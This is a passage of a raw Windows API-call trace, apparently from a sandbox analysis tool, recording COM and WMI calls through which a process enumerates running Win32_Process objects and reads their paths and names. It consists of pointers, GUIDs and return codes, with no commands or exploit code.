Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612308) returned 0x0 [0213.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612308, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.360] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612308, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f320) returned 0x0 [0213.360] WbemDefPath:IUnknown:Release (This=0x5612308) returned 0x0 [0213.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f320) returned 0x0 [0213.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.361] WbemDefPath:IUnknown:AddRef (This=0x560f320) returned 0x3 [0213.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612318) returned 0x0 [0213.361] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612318, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.361] WbemDefPath:IUnknown:Release (This=0x5612318) returned 0x3 [0213.361] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.361] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.361] WbemDefPath:IUnknown:Release (This=0x560f320) returned 0x2 [0213.361] WbemDefPath:IUnknown:Release (This=0x560f320) returned 0x1 [0213.361] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.361] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f320, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f320) returned 0x0 [0213.361] WbemDefPath:IUnknown:AddRef (This=0x560f320) returned 0x3 [0213.361] WbemDefPath:IUnknown:Release (This=0x560f320) returned 0x2 [0213.361] WbemDefPath:IWbemPath:SetText (This=0x560f320, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.361] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.362] IWbemClassObject:Get (in: This=0x56173b0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2681b54*=0, plFlavor=0x2681b58*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="deep.exe", varVal2=0x0), pType=0x2681b54*=8, plFlavor=0x2681b58*=0) returned 0x0 [0213.362] SysStringByteLen (bstr="deep.exe") returned 0x10 [0213.362] SysStringByteLen (bstr="deep.exe") returned 0x10 [0213.362] IWbemClassObject:Get (in: This=0x56173b0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2681b54*=8, plFlavor=0x2681b58*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="deep.exe", varVal2=0x0), pType=0x2681b54*=8, plFlavor=0x2681b58*=0) returned 0x0 [0213.362] SysStringByteLen (bstr="deep.exe") returned 0x10 [0213.362] SysStringByteLen (bstr="deep.exe") returned 0x10 [0213.362] CoTaskMemAlloc (cb=0x4) returned 0x5612348 [0213.362] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612348, puReturned=0x267acc0 | out: apObjects=0x5612348*=0x5617818, puReturned=0x267acc0*=0x1) returned 0x0 [0213.363] IUnknown:QueryInterface (in: This=0x5617818, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5617818) returned 0x0 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.364] IUnknown:AddRef (This=0x5617818) returned 0x3 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x561781c) returned 0x0 [0213.364] IMarshal:GetUnmarshalClass (in: This=0x561781c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.364] IUnknown:Release (This=0x561781c) returned 0x3 [0213.364] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.364] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.364] IUnknown:Release (This=0x5617818) returned 0x2 [0213.364] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.364] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.364] IUnknown:QueryInterface (in: This=0x5617818, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5617818) returned 0x0 [0213.364] IUnknown:AddRef (This=0x5617818) returned 0x4 [0213.364] IUnknown:Release (This=0x5617818) returned 0x3 [0213.364] IUnknown:Release (This=0x5617818) returned 0x2 [0213.364] CoTaskMemFree (pv=0x5612348) [0213.365] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.365] IUnknown:AddRef (This=0x5617818) returned 0x3 [0213.365] IWbemClassObject:Get (in: This=0x5617818, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.365] IWbemClassObject:Get (in: This=0x5617818, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.365] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0213.365] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0213.365] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.365] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.365] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.365] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.366] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612348) returned 0x0 [0213.366] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612348, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.366] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612348, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f400) returned 0x0 [0213.366] WbemDefPath:IUnknown:Release (This=0x5612348) returned 0x0 [0213.366] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f400) returned 0x0 [0213.366] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.367] WbemDefPath:IUnknown:AddRef (This=0x560f400) returned 0x3 [0213.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612358) returned 0x0 [0213.367] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612358, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.367] WbemDefPath:IUnknown:Release (This=0x5612358) returned 0x3 [0213.367] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.367] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.367] WbemDefPath:IUnknown:Release (This=0x560f400) returned 0x2 [0213.367] WbemDefPath:IUnknown:Release (This=0x560f400) returned 0x1 [0213.367] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.367] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f400, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f400) returned 0x0 [0213.367] WbemDefPath:IUnknown:AddRef (This=0x560f400) returned 0x3 [0213.367] WbemDefPath:IUnknown:Release (This=0x560f400) returned 0x2 [0213.367] WbemDefPath:IWbemPath:SetText (This=0x560f400, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x0 [0213.367] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.367] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.368] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.368] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.368] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.368] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.368] IWbemClassObject:Get (in: This=0x5617818, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26823b8*=0, plFlavor=0x26823bc*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="candidate-coach.exe", varVal2=0x0), pType=0x26823b8*=8, plFlavor=0x26823bc*=0) returned 0x0 [0213.368] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0213.368] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0213.368] IWbemClassObject:Get (in: This=0x5617818, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26823b8*=8, plFlavor=0x26823bc*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="candidate-coach.exe", varVal2=0x0), pType=0x26823b8*=8, plFlavor=0x26823bc*=0) returned 0x0 [0213.368] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0213.368] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0213.368] CoTaskMemAlloc (cb=0x4) returned 0x5612388 [0213.368] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612388, puReturned=0x267acc0 | out: apObjects=0x5612388*=0x560c980, puReturned=0x267acc0*=0x1) returned 0x0 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560c980) returned 0x0 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.369] IUnknown:AddRef (This=0x560c980) returned 0x3 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.369] IUnknown:QueryInterface (in: This=0x560c980, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560c984) returned 0x0 [0213.369] IMarshal:GetUnmarshalClass (in: This=0x560c984, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.369] IUnknown:Release (This=0x560c984) returned 0x3 [0213.369] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.370] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.370] IUnknown:QueryInterface (in: This=0x560c980, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.370] IUnknown:Release (This=0x560c980) returned 0x2 [0213.370] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.370] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.370] IUnknown:QueryInterface (in: This=0x560c980, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560c980) returned 0x0 [0213.370] IUnknown:AddRef (This=0x560c980) returned 0x4 [0213.370] IUnknown:Release (This=0x560c980) returned 0x3 [0213.370] IUnknown:Release (This=0x560c980) returned 0x2 [0213.370] CoTaskMemFree (pv=0x5612388) [0213.370] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.370] IUnknown:AddRef (This=0x560c980) returned 0x3 [0213.370] IWbemClassObject:Get (in: This=0x560c980, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.370] IWbemClassObject:Get (in: This=0x560c980, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.371] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x66 [0213.371] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x66 [0213.371] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.371] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.371] IUnknown:QueryInterface (in: This=0x6d0cac, 